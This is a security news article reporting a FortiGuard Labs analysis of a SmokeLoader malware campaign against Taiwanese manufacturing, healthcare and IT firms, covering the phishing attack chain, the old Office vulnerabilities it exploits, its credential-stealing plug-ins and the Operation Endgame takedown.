Latest intelligence shows that Taiwan’s manufacturing, healthcare, and information technology industries are facing a new wave of attacks from the SmokeLoader malware.
According to a report by Fortinet FortiGuard Labs, SmokeLoader is known for its versatility and advanced anti-detection technology, and its modular design can perform a variety of attacks. Although SmokeLoader is mainly used as a downloader to deliver other malicious programs, in this attack, it directly executes the attack by downloading plug-in modules from the command and control server.
SmokeLoader first appeared on hacker forums in 2011 and was primarily used to execute secondary malicious payloads. It has the ability to download additional modules that can be used to steal data, launch distributed denial of service (DDoS) attacks, and mine cryptocurrency.
In-depth analysis by security researchers revealed that SmokeLoader has the ability to detect analysis environments, generate fake network traffic, and obfuscate code to evade detection and hinder analysis efforts. The developers of this malware family continue to introduce new features and employ more advanced obfuscation techniques, making them more powerful and making analysis more difficult.
At the end of May this year, “Operation Endgame” led by Europol destroyed the infrastructure of multiple malware families, including IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee and TrickBot, resulting in a significant reduction in SmokeLoader activity.
The operation successfully destroyed approximately 1,000 command and control domains associated with SmokeLoader and remotely wiped out more than 50,000 infected systems. However, due to the large number of cracked versions on the Internet, hacker groups have been able to continue to use this malware to distribute malicious payloads by establishing new command and control infrastructure.
FortiGuard Labs discovered that the latest attack chain begins with a phishing email containing a Microsoft Excel attachment. When the victim opens the file, the attacker will exploit old security vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to deploy the Ande Loader malware and then use it to deliver the SmokeLoader.
SmokeLoader consists of two main components: the repeater and the main module. The relay is responsible for decrypting, decompressing, and injecting the main module into the explorer.exe program; the main module is responsible for establishing persistence, communicating with the command and control infrastructure, and executing commands.
This malware supports multiple plug-in modules and can steal sensitive information such as login credentials, FTP passwords, email addresses, and cookies from software such as web browsers, Outlook, Thunderbird, FileZilla, and WinSCP.
SmokeLoader chooses to execute the attack through a plug-in module instead of directly downloading the complete file as the final stage of the attack. This move not only highlights the flexibility of SmokeLoader, but also reminds security analysts that they must remain highly vigilant when facing such well-known malicious programs.
Source: Information Security News, December 03, 2024
Transcribed from: TheHackerNews